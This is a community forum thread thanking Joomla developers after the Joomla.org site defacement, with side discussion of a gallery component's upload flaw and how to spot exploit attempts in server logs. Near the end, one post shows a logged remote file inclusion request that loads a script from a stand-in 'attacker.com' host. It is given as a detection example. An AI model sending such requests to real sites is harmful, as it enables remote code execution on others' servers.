Discuss: A long day...

[Tonie]

Hadn't noticed that, fine with me as well.

[mcsmom]

Thank you so much to everyone who got the sites back up--I know you are all exhausted .... sleep, get some fresh air, enjoy the day.

[CoffeeDaze]

Thanks for the official posting!  It's good to know the core is still secure.  My site has been following this issue as well since it began as we run many Joomla sites.  Again, thanks for the response and fast work on resolving the issue.

[AmyStephen]

Louis -

I do appreciate all that you and Rob and the others have done to diagnose and resolve this problem. I respect the transparency in which you described Joomla! org's mistakes and the maturity that comes from accepting responsibility. I am so relieved that this turned out to be a vulnerability within a component not distributed to others. Your commitment and willingness to keep working, in spite of the fact you must have been exhausted, is admired.

But, why, Louis, why cast dispersions on Omaha, Nebraska?

Amy

[mcsmom]

You didn't know you had celebrities in town, did you? They were avoiding the papparazzi, 

[bigodines]

great work guys!

let's see the good sides of this situation:
- it wasn't a bug in the joomla's core. ( \o/ )
- we've seen how important it is to turn off register_globals emulation.
- no one else uses the buggy component (or not )
- there are many people active in the forums during the weekend

lessons learned, now let's get back to our regular lives.

[alledia]

Again, thank you all for your patience and understanding.

No - thank you, Louis for a very impressive post after a mistake. It was direct, honest and very reassuring.

[Rogue4ngel]

Excellent work gents... get some rest.. you more than deserve it.

[rliskey]

I say we all chip in and get Louis and Rob a nice ride with dual built-in laptops, redundant servers, 24x7 mobile net access, cappuccino machine, refrigerator, and pro driver.

[Waseem Sadiq]

I for one am not concerned that Joomla.org got hacked - hackers will find ways of hacking almost anything

The best thing to have come out of all of this is yet another crystal clear indication of the hard work that guys like Louis and Rob put into Joomla to ensure the highest possible levels of security for the Joomla core and the Joomla.org sites - knowing that these guys are not clock-watchers and are willing to make themselves available for the greater good of the community at any time of night or day certainly fills me with confidence.

Waseem raises a glass to Louis, Rob and the rest of the team that have worked their pants off all weekend to rectify the hacker's attempt to deface Joomla.org

[jmc]

I say we all chip in and get Louis and Rob a nice ride with dual built-in laptops, redundant servers, 24x7 mobile net access, cappuccino machine, refrigerator, and pro driver.

I'll lend them mine. Also includes rotisserie.

[cbh]

Agreed. Thank you all for your very hard work on this.

Cheers
Chris Hutcheson

[grace]

Hello: I found a lot of extrange links trying to hack my site the last weekend. First I closed all, then I did a serching for a site name and wrote to the ISP provider into theirs website where was the script.
Unfortunally I received this part of email:
"we will not be able to resolve this issue by e-mail"
"Our Customer Service Specialists will investigate your inquiry and send you a response
within 1 business day."
1 business day, is a paradise for intruders.

So, nobody will be safe on the weekends. The server providers hasn't technical personal.

I'm sorry, for your bad day.
Bye
 

[Kiper]

I hope you have had time to recuperate! Great work as always. Hard to have staff 24/7/365 when you are an Open Source Community.
Hope you are not too exhausted to continue polishing 1.5...

You're the best!

[buffnerd]

It looks like the issue is with expose picture gallery.  See the discussion here: http://www.gotgtek.com/forum/index.php?topic=1315.0

our site: http://bcProject.info has expose installed and it the hackers defaced our site using a vulnerability within expose.  There's a script in the component allowing for the uploading of background images.  It was exploited to allow an attacker to upload files to the site.

Hope that resolves the mystery of "why other sites were hacked the same day".

cheers...

[AmyStephen]

Buffnerd -

Please post this type of information in the Security Section. In the link you provided, someone is linking to JoomlaCode for the current version. So, maybe those who have not upgraded are vulnerable. But, it needs to be shared in the Security forum so that it can be reviewed.

I do not believe there have been many reports of sites cracked. But, reporting the specifics is helpful in the security forum. Many people have enabled "notify" on that forum to receive all security reports. Also, if there really is a "mass attack" the Joomla! forum can collect good information to share with the rest of the community. This is even more important if a specific third party extension is suspected - there are places that type of information is recorded so that others can receive such information immediately and so a historical record is maintained.

Thanks!
Amy

[cozimek]

From my vantage here, I want to thank Rob for responding to my text message so early in the morning and then the rest of the core for rocking and rolling for the next 24 hours.  Amazing work folks.  Hats off to everyone that contributed their precious weekends with families to the Joomla! community.

Best,
Ryan

[Habbekrats]

First of all, will some kids end up in a Turkish Jail because they had a bit of fun with some sloppy site management? It happens. Get over it  and no Turkish police, thank you. Some Midnight Express, anyone?

Secondly, wakie wakie, eggs and bakie. 

[Solitary_God]

Interesting, I'm glad this was a problem with a non-publicly released component. I'm really really new to Joomla, but I am a info security student who is also just now getting into web development. Just chance that I found Joomla (which btw is THE best!) and choose it for learning more about web dev,php and mysql.

I have read the security warnings (forum/FAQ) for Joomla and have taken these steps on my 2 dev. projects, BUT that really only goes so far. New people, myself included, can read till their eyes bulge from too much coffee and eye strain... but if they they don't "know" how to recognize attack attempts, be it mysql injection or strange request.... how are we to know besides the infamous

((This site has been defaced by some camel humping idiot)) "sorry camels"

Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.

I know it's largely a apache/mysql subject, but I think allot of these attacks could be prevented with a little more Joomla specific education.

I'd imagine most Joomla users wouldn't know where to start, or what to check for regularly (I get lost). I think this would make serious users more aware and would in the long run help you all (dev team).

Just a suggestion, feasible?

[romit]

Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.

For a start, You can search the logs for the text

Code: Select all

index.php?mosConfig_absolute_path=

as Rob mentions here

[HH]

Thanks a lot gus for the good job.

I've one addition to this

Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.

For a start, You can search the logs for the text

Code: Select all

index.php?mosConfig_absolute_path=

as Rob mentions here

the request maybe accompanied by a 403 error message. For example the logs of the server may show the following:

Code: Select all

[date/time] "GET index.php?mosConfig_absolute_path==http://www.attacker.com/script.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.807" 101.131.131.101 - -

of course, parameters differs according to the websites path + attacker's script

[Solitary_God]

Ok, I can understand that. I'm a day or 2 from releasing a development project which I myself will be hosting, so I want to get a good understanding of how to reconize exploit attempts outside of firewall logs. Good to know what to look for in logs. Thanks again for your time!

[RobS]

Joomla! 1.0.11+ have come with some mod_rewrite rules at the end of the htaccess.txt file that examine URLs for known exploit attempts.  I would recommend having a look at those rules for some ideas on what to look for in log files.  Also, use the script.  That is what is causing the 403 error that HH described.